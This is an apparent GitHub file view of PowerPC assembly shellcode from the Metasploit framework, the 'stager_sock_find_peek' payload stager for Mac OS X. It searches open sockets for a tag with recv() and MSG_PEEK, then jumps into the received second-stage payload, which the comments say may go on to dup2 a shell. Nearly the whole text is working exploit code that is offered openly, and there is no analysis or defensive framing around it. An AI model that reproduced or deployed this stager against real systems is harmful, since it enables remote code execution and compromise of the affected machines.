-
Notifications
You must be signed in to change notification settings - Fork 1
/
shellcode-123.c
executable file
·57 lines (47 loc) · 1.32 KB
/
shellcode-123.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
;;
;
; Name: stager_sock_find_peek
; Qualities: Null-Free
; Platforms: MacOS X / PPC
; Authors: H D Moore < hdm [at] metasploit.com >
; Version: $Revision: 1.1 $
; License:
;
; This file is part of the Metasploit Exploit Framework
; and is subject to the same licenses and copyrights as
; the rest of this package.
;
; Description:
;
; This payload will recv() downward until the read
; data contains the search tag (0xXXXX1337). Once the
; tag is located, it will jump into the payload. The
; recv() call is passed the MSG_PEEK flag, the stage
; will need to flush the recv() queue before doing
; something like dup2'ing a shell.
;
;;
.globl _main
.text
_main:
li r29, 0xfff
li r30, 0xfff
addic. r28, r29, -0xfff +1
findsock:
subf. r30, r28, r30
blt _main
subi r0, r29, 0xfff - 102
mr r3, r30
subi r4, r1, 4104
li r5, 4095
subi r6, r29, 0xfff - 0x82
.long 0x44ffff02
xor. r6, r6, r6
lhz r27, -4104(r1)
cmpwi r27, 0x1337
bne findsock
gotsock:
subi r4, r1, 4100
mtctr r4
blectr
xor. r6, r6, r6